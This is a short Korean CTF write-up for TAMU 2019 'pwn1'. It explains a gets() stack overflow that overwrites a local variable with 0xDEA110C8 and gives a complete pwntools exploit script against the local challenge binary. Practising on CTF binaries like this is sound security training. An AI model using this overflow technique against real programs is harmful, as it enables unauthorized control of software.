[TAMU 2019] pwn1

checksec

IDA로 pseudo code 확인

main()함수의 pseudo code

name, quest에 정답이 들어가도록 하고

gets(&s)을 이용해서 s에 dummy값을 넣어 overflow 시켜 v5의 값을 0xDEA110C8로 바꿈

 

 

 

print_flag()함수의 pseudo code

./pwn1

대충 이런식으로 작동 >> name, quest를 위와 같이 입력해야 다음 진행 가능

 

 

문자열 s와 v5의 거리 = 0x3B-0x10

>> dummy값으로 채워주기

 

from pwn import *

p=process("./pwn1")

p.sendlineafter("What... is your name?","Sir Lancelot of Camelot")
p.sendlineafter("What... is your quest?","To seek the Holy Grail.")

pl="A"*(0x3B-0x10)
pl+=p32(0xDEA110C8)

p.recvuntil("What... is my secret?")
p.sendline(pl)

p.interactive()